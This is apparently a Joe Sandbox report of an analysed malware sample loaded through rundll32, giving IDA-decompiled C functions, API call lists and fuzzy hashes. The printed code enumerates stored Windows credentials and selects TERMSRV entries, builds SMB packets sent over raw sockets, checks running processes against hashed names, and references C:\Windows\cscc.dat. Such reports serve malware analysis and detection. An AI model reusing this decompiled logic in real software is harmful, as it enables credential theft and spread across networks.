                                                                                                          • VirtualFree.KERNEL32(00000000,?,00004000), ref: 04A49323
                                                                                                            • Part of subcall function 04A48F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04A48F52
                                                                                                            • Part of subcall function 04A48F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,032E55B8), ref: 04A48FB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$Protect$AllocFreememcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2644210-0
                                                                                                          • Opcode ID: 7d79ad8ec1212e613ca399bac06555e3f1fc80cf32d6d0aab02fc1d3b3fca858
                                                                                                          • Instruction ID: 662cf165a4b927d61f4ae94cb92d47fe00a32cc753e6eade7095498ee63ab50f
                                                                                                          • Opcode Fuzzy Hash: 7d79ad8ec1212e613ca399bac06555e3f1fc80cf32d6d0aab02fc1d3b3fca858
                                                                                                          • Instruction Fuzzy Hash: F921D1F5700301ABEB209B799D44B9FB79CEBD5754F08012CB916E7680DA74F8108B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4BECB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                          				intOrPtr _t34;
                                                                                                          				int _t39;
                                                                                                          				int _t41;
                                                                                                          				void* _t49;
                                                                                                          				intOrPtr _t52;
                                                                                                          				int _t53;
                                                                                                          				int _t54;
                                                                                                          				intOrPtr _t57;
                                                                                                          				int _t60;
                                                                                                          				int _t62;
                                                                                                          				intOrPtr _t64;
                                                                                                          				void* _t65;
                                                                                                          
                                                                                                          				_t57 = _a4;
                                                                                                          				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
                                                                                                          				if( *(_t64 + 0x34) != 0) {
                                                                                                          					L3:
                                                                                                          					if( *(_t64 + 0x28) == 0) {
                                                                                                          						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
                                                                                                          						 *(_t64 + 0x30) = 0;
                                                                                                          						 *(_t64 + 0x2c) = 0;
                                                                                                          					}
                                                                                                          					_t60 =  *(_t64 + 0x28);
                                                                                                          					_t52 = _a12;
                                                                                                          					_t34 = _a8;
                                                                                                          					if(_t52 < _t60) {
                                                                                                          						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
                                                                                                          						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
                                                                                                          						_t53 = _t52 - _t62;
                                                                                                          						if(_t53 == 0) {
                                                                                                          							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
                                                                                                          							_t54 =  *(_t64 + 0x28);
                                                                                                          							if( *(_t64 + 0x30) == _t54) {
                                                                                                          								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                          							}
                                                                                                          							_t39 =  *(_t64 + 0x2c);
                                                                                                          							if(_t39 >= _t54) {
                                                                                                          								goto L15;
                                                                                                          							} else {
                                                                                                          								_t41 = _t39 + _t62;
                                                                                                          								goto L14;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
                                                                                                          						 *(_t64 + 0x30) = _t53;
                                                                                                          						goto L7;
                                                                                                          					} else {
                                                                                                          						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
                                                                                                          						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                          						L7:
                                                                                                          						_t41 =  *(_t64 + 0x28);
                                                                                                          						L14:
                                                                                                          						 *(_t64 + 0x2c) = _t41;
                                                                                                          						L15:
                                                                                                          						return 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
                                                                                                          				_t65 = _t65 + 0xc;
                                                                                                          				 *(_t64 + 0x34) = 1;
                                                                                                          				if(_t49 != 0) {
                                                                                                          					goto L3;
                                                                                                          				}
                                                                                                          				return 1;
                                                                                                          			}















                                                                                                          0x04a4bece
                                                                                                          0x04a4bed4
                                                                                                          0x04a4bedf
                                                                                                          0x04a4bf01
                                                                                                          0x04a4bf04
                                                                                                          0x04a4bf0b
                                                                                                          0x04a4bf0e
                                                                                                          0x04a4bf11
                                                                                                          0x04a4bf11
                                                                                                          0x04a4bf14
                                                                                                          0x04a4bf17
                                                                                                          0x04a4bf1a
                                                                                                          0x04a4bf1f
                                                                                                          0x04a4bf3e
                                                                                                          0x04a4bf4c
                                                                                                          0x04a4bf54
                                                                                                          0x04a4bf56
                                                                                                          0x04a4bf6f
                                                                                                          0x04a4bf72
                                                                                                          0x04a4bf78
                                                                                                          0x04a4bf7a
                                                                                                          0x04a4bf7a
                                                                                                          0x04a4bf7e
                                                                                                          0x04a4bf83
                                                                                                          0x00000000
                                                                                                          0x04a4bf85
                                                                                                          0x04a4bf85
                                                                                                          0x00000000
                                                                                                          0x04a4bf85
                                                                                                          0x04a4bf83
                                                                                                          0x04a4bf62
                                                                                                          0x04a4bf6a
                                                                                                          0x00000000
                                                                                                          0x04a4bf21
                                                                                                          0x04a4bf28
                                                                                                          0x04a4bf30
                                                                                                          0x04a4bf34
                                                                                                          0x04a4bf34
                                                                                                          0x04a4bf87
                                                                                                          0x04a4bf87
                                                                                                          0x04a4bf8a
                                                                                                          0x00000000
                                                                                                          0x04a4bf8a
                                                                                                          0x04a4bf1f
                                                                                                          0x04a4beed
                                                                                                          0x04a4bef0
                                                                                                          0x04a4bef3
                                                                                                          0x04a4bef8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: Oqt
                                                                                                          • API String ID: 3510742995-2617001805
                                                                                                          • Opcode ID: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
                                                                                                          • Instruction ID: b82828cb97084175b34b8be5150bae9f6d9892f2668d6cb1403bd60e389b6901
                                                                                                          • Opcode Fuzzy Hash: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
                                                                                                          • Instruction Fuzzy Hash: CA212EB2610B059FD7608F2ACA8492BB7E9FFD87147445A2DE98A87E50D331F854CF60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4501E(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, char _a20, void** _a24) {
                                                                                                          				void* _t25;
                                                                                                          				void* _t28;
                                                                                                          				void* _t29;
                                                                                                          				signed int _t30;
                                                                                                          
                                                                                                          				_t29 = __ecx;
                                                                                                          				_t28 = 0;
                                                                                                          				if(E04A42F5A(_a4, _a8, _a12, 0, 0xff, 8, _a16, _a20) != 0) {
                                                                                                          					_a20 = 0;
                                                                                                          					_a16 = 0;
                                                                                                          					if(E04A43071(_t29, _a4, _a8, _a12,  &_a16,  &_a20) != 0) {
                                                                                                          						_t25 = _a16;
                                                                                                          						if(_a20 == 0x74 &&  *((intOrPtr*)(_t25 + 0x50)) == 0x1c &&  *((intOrPtr*)(_t25 + 0x70)) == 0) {
                                                                                                          							_t30 = 5;
                                                                                                          							_t25 = memcpy( *_a24, _t25 + 0x5c, _t30 << 2);
                                                                                                          							_t28 = 1;
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t25);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t28;
                                                                                                          			}







                                                                                                          0x04a4501e
                                                                                                          0x04a45025
                                                                                                          0x04a45042
                                                                                                          0x04a4504f
                                                                                                          0x04a45055
                                                                                                          0x04a45062
                                                                                                          0x04a45068
                                                                                                          0x04a4506b
                                                                                                          0x04a45081
                                                                                                          0x04a45085
                                                                                                          0x04a45088
                                                                                                          0x04a4508a
                                                                                                          0x04a45095
                                                                                                          0x04a45095
                                                                                                          0x04a45062
                                                                                                          0x04a4509f

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A42F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04A42F73
                                                                                                            • Part of subcall function 04A42F5A: HeapAlloc.KERNEL32(00000000), ref: 04A42F7C
                                                                                                            • Part of subcall function 04A42F5A: GetProcessHeap.KERNEL32(00000008,?,761DC2E0), ref: 04A42F97
                                                                                                            • Part of subcall function 04A42F5A: HeapAlloc.KERNEL32(00000000), ref: 04A42F9A
                                                                                                            • Part of subcall function 04A42F5A: htons.WS2_32(424D53FE), ref: 04A42FBA
                                                                                                            • Part of subcall function 04A42F5A: memcpy.MSVCRT ref: 04A4300B
                                                                                                            • Part of subcall function 04A42F5A: send.WS2_32(?,00000000,?,00000000), ref: 04A4301B
                                                                                                            • Part of subcall function 04A42F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A43032
                                                                                                            • Part of subcall function 04A42F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A43048
                                                                                                            • Part of subcall function 04A42F5A: HeapFree.KERNEL32(00000000), ref: 04A4304F
                                                                                                            • Part of subcall function 04A42F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 04A4305A
                                                                                                            • Part of subcall function 04A42F5A: HeapFree.KERNEL32(00000000), ref: 04A43061
                                                                                                            • Part of subcall function 04A43071: GetProcessHeap.KERNEL32(00000008,0000FFFF,74714F20,00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04A43089
                                                                                                            • Part of subcall function 04A43071: HeapAlloc.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43092
                                                                                                            • Part of subcall function 04A43071: GetProcessHeap.KERNEL32(00000008,0000003F,74715520,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A430A4
                                                                                                            • Part of subcall function 04A43071: HeapAlloc.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A430A7
                                                                                                            • Part of subcall function 04A43071: htons.WS2_32(0000003B), ref: 04A430BF
                                                                                                            • Part of subcall function 04A43071: send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 04A430F7
                                                                                                            • Part of subcall function 04A43071: recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 04A4310D
                                                                                                            • Part of subcall function 04A43071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43127
                                                                                                            • Part of subcall function 04A43071: HeapAlloc.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A4312E
                                                                                                            • Part of subcall function 04A43071: memcpy.MSVCRT ref: 04A43144
                                                                                                            • Part of subcall function 04A43071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43153
                                                                                                            • Part of subcall function 04A43071: HeapFree.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A4315A
                                                                                                            • Part of subcall function 04A43071: GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A43165
                                                                                                            • Part of subcall function 04A43071: HeapFree.KERNEL32(00000000,?,?,?,04A44F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A4316C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,000000FF,00000008,?,00000000,00000000), ref: 04A4508E
                                                                                                          • HeapFree.KERNEL32(00000000,?,04A452E8,?,?,?,00000000), ref: 04A45095
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt$t
                                                                                                          • API String ID: 2433318192-1385241573
                                                                                                          • Opcode ID: d77f0e0326565c8538af8716ee72892310add21bf0f8f8bbb6f07a263cb25a6f
                                                                                                          • Instruction ID: ed2967813bdc5c0766b2884c212fcb6f8e78efc49604553d7f6309d46f9bfc75
                                                                                                          • Opcode Fuzzy Hash: d77f0e0326565c8538af8716ee72892310add21bf0f8f8bbb6f07a263cb25a6f
                                                                                                          • Instruction Fuzzy Hash: 8611187650020ABFEF119F40D980DAF7B29FBD5394F004026FE005A161C732A966DBE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 95%
                                                                                                          			E04A4855F() {
                                                                                                          				char _v524;
                                                                                                          				void* _v560;
                                                                                                          				int _t8;
                                                                                                          				void* _t10;
                                                                                                          				signed int _t13;
                                                                                                          				signed int _t14;
                                                                                                          				void* _t15;
                                                                                                          
                                                                                                          				_t14 = _t13 | 0xffffffff;
                                                                                                          				_t15 = CreateToolhelp32Snapshot(2, 0);
                                                                                                          				if(_t15 != _t14) {
                                                                                                          					_push( &_v560);
                                                                                                          					_v560 = 0x22c;
                                                                                                          					_t8 = Process32FirstW(_t15);
                                                                                                          					while(_t8 != 0) {
                                                                                                          						_t10 = E04A482EE( &_v524);
                                                                                                          						if(_t10 == 0x4a241c3e) {
                                                                                                          							L10:
                                                                                                          							_t14 = _t14 & 0xffffffef;
                                                                                                          						} else {
                                                                                                          							if(_t10 == 0x923ca517) {
                                                                                                          								L9:
                                                                                                          								_t14 = _t14 & 0xffffffbf;
                                                                                                          							} else {
                                                                                                          								if(_t10 == 0x966d0415 || _t10 == 0xaa331620) {
                                                                                                          									goto L10;
                                                                                                          								} else {
                                                                                                          									if(_t10 == 0xc8f10976) {
                                                                                                          										goto L9;
                                                                                                          									} else {
                                                                                                          										if(_t10 == 0xe2517a14) {
                                                                                                          											goto L10;
                                                                                                          										} else {
                                                                                                          											if(_t10 == 0xe5a05a00) {
                                                                                                          												goto L9;
                                                                                                          											}
                                                                                                          										}
                                                                                                          									}
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_t8 = Process32NextW(_t15,  &_v560);
                                                                                                          					}
                                                                                                          					CloseHandle(_t15);
                                                                                                          				}
                                                                                                          				return _t14;
                                                                                                          			}










                                                                                                          0x04a4856e
                                                                                                          0x04a48577
                                                                                                          0x04a4857b
                                                                                                          0x04a48583
                                                                                                          0x04a48585
                                                                                                          0x04a4858f
                                                                                                          0x04a485ea
                                                                                                          0x04a4859e
                                                                                                          0x04a485a8
                                                                                                          0x04a485d9
                                                                                                          0x04a485d9
                                                                                                          0x04a485aa
                                                                                                          0x04a485af
                                                                                                          0x04a485d4
                                                                                                          0x04a485d4
                                                                                                          0x04a485b1
                                                                                                          0x04a485b6
                                                                                                          0x00000000
                                                                                                          0x04a485bf
                                                                                                          0x04a485c4
                                                                                                          0x00000000
                                                                                                          0x04a485c6
                                                                                                          0x04a485cb
                                                                                                          0x00000000
                                                                                                          0x04a485cd
                                                                                                          0x04a485d2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a485d2
                                                                                                          0x04a485cb
                                                                                                          0x04a485c4
                                                                                                          0x04a485b6
                                                                                                          0x04a485af
                                                                                                          0x04a485e4
                                                                                                          0x04a485e4
                                                                                                          0x04a485ef
                                                                                                          0x04a485ef
                                                                                                          0x04a485fa

                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A48571
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 04A4858F
                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A485E4
                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04A485EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 420147892-0
                                                                                                          • Opcode ID: a90b132d5ef09750811b6f3280f3a6cbf464964b6fb0aedd7000e806ff2eff43
                                                                                                          • Instruction ID: 88553be5e83c5be708b4cffb790d27292d81b2ddb489268f3a67e98ec0877f16
                                                                                                          • Opcode Fuzzy Hash: a90b132d5ef09750811b6f3280f3a6cbf464964b6fb0aedd7000e806ff2eff43
                                                                                                          • Instruction Fuzzy Hash: 0801B97E5026146BDA307B6CBC4CAAF76E897CD320F14475AED12D20D4E72CA9814A53
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 35%
                                                                                                          			E04A476F2(intOrPtr _a4) {
                                                                                                          				void* _v8;
                                                                                                          				void* _v12;
                                                                                                          				char _v16;
                                                                                                          				signed int _v20;
                                                                                                          				intOrPtr _v24;
                                                                                                          				void* __esi;
                                                                                                          				char* _t30;
                                                                                                          				signed int _t32;
                                                                                                          				intOrPtr _t33;
                                                                                                          				signed int _t38;
                                                                                                          				signed short* _t41;
                                                                                                          				void* _t44;
                                                                                                          				char* _t45;
                                                                                                          				signed short* _t49;
                                                                                                          
                                                                                                          				_t38 = 0;
                                                                                                          				_t30 =  &_v8;
                                                                                                          				_v12 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				__imp__CredEnumerateW(0, 0, _t30,  &_v12);
                                                                                                          				_v24 = _t30;
                                                                                                          				if(_t30 == 0) {
                                                                                                          					L19:
                                                                                                          					return _v24;
                                                                                                          				}
                                                                                                          				_t32 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				if(_v8 <= 0) {
                                                                                                          					L18:
                                                                                                          					__imp__CredFree(_v12);
                                                                                                          					goto L19;
                                                                                                          				}
                                                                                                          				do {
                                                                                                          					_t33 =  *((intOrPtr*)(_v12 + _t32 * 4));
                                                                                                          					_t49 =  *(_t33 + 8);
                                                                                                          					if(_t49 == _t38) {
                                                                                                          						L14:
                                                                                                          						if( *((intOrPtr*)(_t33 + 4)) != 2) {
                                                                                                          							goto L16;
                                                                                                          						}
                                                                                                          						L15:
                                                                                                          						E04A46B95(_t49, 0, _a4);
                                                                                                          						goto L16;
                                                                                                          					}
                                                                                                          					_v16 = 8;
                                                                                                          					_t45 = L"TERMSRV/";
                                                                                                          					_t41 = _t49;
                                                                                                          					while( *_t41 ==  *_t45) {
                                                                                                          						_t41 =  &(_t41[1]);
                                                                                                          						_t45 =  &(_t45[2]);
                                                                                                          						_t13 =  &_v16;
                                                                                                          						 *_t13 = _v16 - 1;
                                                                                                          						if( *_t13 != 0) {
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						_t38 = 0;
                                                                                                          						_t44 = 0;
                                                                                                          						L8:
                                                                                                          						if((0 | _t44 == _t38) == _t38) {
                                                                                                          							goto L14;
                                                                                                          						}
                                                                                                          						_t49 =  &(_t49[8]);
                                                                                                          						if( *((intOrPtr*)(_t33 + 4)) != 1) {
                                                                                                          							goto L14;
                                                                                                          						}
                                                                                                          						if( *((intOrPtr*)(_t33 + 0x30)) != _t38 &&  *((intOrPtr*)(_t33 + 0x1c)) != _t38) {
                                                                                                          							E04A469AE( *((intOrPtr*)(_t33 + 0x30)),  *((intOrPtr*)(_t33 + 0x1c)), _t38);
                                                                                                          						}
                                                                                                          						goto L15;
                                                                                                          					}
                                                                                                          					asm("sbb ecx, ecx");
                                                                                                          					_t44 = ( *_t41 & 0xfffe) + 1;
                                                                                                          					_t38 = 0;
                                                                                                          					goto L8;
                                                                                                          					L16:
                                                                                                          					_t32 = _v20 + 1;
                                                                                                          					_v20 = _t32;
                                                                                                          				} while (_t32 < _v8);
                                                                                                          				goto L18;
                                                                                                          			}

















                                                                                                          0x04a476fd
                                                                                                          0x04a476ff
                                                                                                          0x04a47705
                                                                                                          0x04a47708
                                                                                                          0x04a4770b
                                                                                                          0x04a47711
                                                                                                          0x04a47716
                                                                                                          0x04a477c9
                                                                                                          0x04a477ce
                                                                                                          0x04a477ce
                                                                                                          0x04a4771c
                                                                                                          0x04a4771e
                                                                                                          0x04a47724
                                                                                                          0x04a477c0
                                                                                                          0x04a477c3
                                                                                                          0x00000000
                                                                                                          0x04a477c3
                                                                                                          0x04a4772c
                                                                                                          0x04a47732
                                                                                                          0x04a47734
                                                                                                          0x04a47739
                                                                                                          0x04a4779c
                                                                                                          0x04a477a0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a477a2
                                                                                                          0x04a477a9
                                                                                                          0x00000000
                                                                                                          0x04a477a9
                                                                                                          0x04a4773b
                                                                                                          0x04a47742
                                                                                                          0x04a47747
                                                                                                          0x04a47749
                                                                                                          0x04a47751
                                                                                                          0x04a47754
                                                                                                          0x04a47757
                                                                                                          0x04a47757
                                                                                                          0x04a4775a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4775c
                                                                                                          0x04a4775e
                                                                                                          0x04a47760
                                                                                                          0x04a47769
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4776b
                                                                                                          0x04a47772
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a47777
                                                                                                          0x04a47785
                                                                                                          0x04a47785
                                                                                                          0x00000000
                                                                                                          0x04a47777
                                                                                                          0x04a47792
                                                                                                          0x04a47797
                                                                                                          0x04a47798
                                                                                                          0x00000000
                                                                                                          0x04a477ae
                                                                                                          0x04a477b1
                                                                                                          0x04a477b2
                                                                                                          0x04a477b5
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 04A4770B
                                                                                                          • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 04A477C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cred$EnumerateFree
                                                                                                          • String ID: TERMSRV/
                                                                                                          • API String ID: 3403564193-3001602198
                                                                                                          • Opcode ID: 07de83a3c5ef54900d89c717d1266f552f92174358e686271a50561db8e9143d
                                                                                                          • Instruction ID: f683c180bbaf84275eef5ec6a790fc50b1300f328d91d1af76fd73de843ccacc
                                                                                                          • Opcode Fuzzy Hash: 07de83a3c5ef54900d89c717d1266f552f92174358e686271a50561db8e9143d
                                                                                                          • Instruction Fuzzy Hash: 9221A1BAA00145DFDF14DFA5C9C08AEBBB6FFC4314BA584BAD102A7211D370A989CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 37%
                                                                                                          			E04A49332(void* __eax, CHAR* _a4) {
                                                                                                          				void* _t16;
                                                                                                          
                                                                                                          				_t16 = 0;
                                                                                                          				__imp__#52(_a4);
                                                                                                          				if(__eax != 0) {
                                                                                                          					wsprintfA(_a4, "%u.%u.%u.%u",  *( *( *(__eax + 0xc))) & 0x000000ff, ( *( *(__eax + 0xc)))[1] & 0x000000ff,  *(_t10 + 2) & 0x000000ff,  *(_t10 + 3) & 0x000000ff);
                                                                                                          					_t16 = 1;
                                                                                                          				}
                                                                                                          				return _t16;
                                                                                                          			}




                                                                                                          0x04a49339
                                                                                                          0x04a4933b
                                                                                                          0x04a49343
                                                                                                          0x04a49365
                                                                                                          0x04a4936e
                                                                                                          0x04a4936e
                                                                                                          0x04a49373

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: gethostbynamewsprintf
                                                                                                          • String ID: %u.%u.%u.%u
                                                                                                          • API String ID: 3411498959-1542503432
                                                                                                          • Opcode ID: 4197c85ff51c08fc607dd783b6b2f5034889a9d812e347bf7654fcf96af7a159
                                                                                                          • Instruction ID: 4ee2c0c347b93b176f09e13699bb4b3bb4206c9e4c517f8814b10977dde90cf5
                                                                                                          • Opcode Fuzzy Hash: 4197c85ff51c08fc607dd783b6b2f5034889a9d812e347bf7654fcf96af7a159
                                                                                                          • Instruction Fuzzy Hash: 91E02BB02040607F83050B59DC18C77BFECDF492527094195F985CB132C129DA20DBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A47E69(WCHAR* _a4) {
                                                                                                          				void* _t4;
                                                                                                          
                                                                                                          				_t4 = 0;
                                                                                                          				if(PathCombineW(_a4, L"C:\\Windows\\", L"cscc.dat") != 0) {
                                                                                                          					_t4 = 1;
                                                                                                          				}
                                                                                                          				return _t4;
                                                                                                          			}




                                                                                                          0x04a47e7a
                                                                                                          0x04a47e84
                                                                                                          0x04a47e86
                                                                                                          0x04a47e86
                                                                                                          0x04a47e8b

                                                                                                          APIs
                                                                                                          • PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04A47EA6,?), ref: 04A47E7C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
